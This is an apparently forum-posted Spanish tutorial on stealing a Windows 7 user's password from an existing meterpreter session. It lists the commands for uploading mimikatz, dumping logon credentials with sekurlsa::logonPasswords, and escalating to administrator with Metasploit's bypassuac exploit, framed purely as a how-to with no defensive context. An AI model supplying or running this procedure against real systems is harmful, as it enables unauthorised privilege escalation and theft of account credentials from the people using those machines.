Meterpreter + mimikatz

En esta pequeña guía les mostrare como obtener la contraseña de un Windows 7.

Cuando tenemos una sesión con meterpreter y queremos elevar privilegio lo normal es hacer uso de

getsystem

o también

hashdump

pero este ultimo nos arroja los hashes y desencriptarlo puede ser un problema (tiempo).

Si hicieramos uso de getsystem posiblemente obtengamos este error:



Esto es porque para poder ejecutar mimikatz con una shell (cmd), necesitamos privilegios, descargamos You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, lo que no interesa es la aplicacion de 32 bits, dentro del directorio Win32



ya que tratandose de un Windows 7 de 32 bits obviamente haremos uso de ello.

subimos mimikatz.exe con el comando upload



lo siguiente es lanzar una shell

shell

y posteriormente ejecutar mimikatz.exe con los comandos propios de la aplicación.

privilege::debug
sekurlsa::logonPasswords full

Nos saldrá este error esto por el tema de privilegios



Para ello haremos uso de este exploit "exploit/windows/local/bypassuac", pero antes tenemos que enviar la sesion a background con el mismo comando.

background

Luego lanzamos el exploit con la sesion del Windows 7 en este caso la primera

use exploit/windows/local/bypassuac
set SESSION 1
exploit

Luego habremos obtenido una segunda sesión con privilegios de administrador, hacemos uso de ella con

sessions -i 2

nos damos cuenta que tenemos maximos privilegios con el comando

getuid

Finalmente lanzamos la shell y ejecutamos mimikatz.exe



Eso es todo Saludos